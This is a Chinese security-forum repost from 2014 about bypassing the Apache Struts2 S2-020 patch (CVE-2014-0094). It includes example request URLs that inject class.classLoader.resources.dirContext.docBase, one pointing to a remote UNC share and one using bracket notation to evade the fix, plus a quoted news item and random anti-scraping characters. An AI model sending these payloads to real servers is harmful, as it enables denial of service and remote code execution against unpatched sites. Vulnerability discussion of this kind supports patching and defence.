之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用!
" a9 s8 m" h* G' r; ^& G/ K" I/ _$ I7 `8 e k; @8 f
暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test' Y5 X4 M4 ]; R8 a
9 c6 g. {( S* \# v[color=rgb(51, 102, 153) !important]复制代码% B9 X, H0 Q" s
: Q7 w/ s) f' o' ]
绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
/ U" g' h% v8 m# q4 Q0 r3 N7 `
/ `- I3 \ d C" L, y, _2 [ `
[color=rgb(51, 102, 153) !important]复制代码
0 ^6 [; q5 N- T X8 Q+ q/ T$ U" T, `, s( |$ _% G9 Z
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。 3 O# n0 U U P/ l# P+ f8 u7 g* c
加速乐发了新闻: 8 e% e. A, v. l5 A& U) u8 D/ s
http://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
: T; | [0 c% z8 x- E. a, s4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。
8 _+ R% S% b3 r- U3 h
. K6 g2 S8 r( {9 c; g5 p据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。
/ K0 J7 W# y( x7 P6 H* j8 [
! Z" |1 n8 G$ i$ T9 ?8 D, E6 E$ \9 \% H) p& }3 x4 f
. [' C* w, w y. K0 Y$ [8 I3 N" b y @转载自乌云
) |, A; [. B. `, ^8 Z原文链接:http://zone.wooyun.org/content/11876/ Z8 w6 F# a+ X( [ y& x4 h& S
|
发表于 2014-4-27 19:10:10
收藏
支持
反对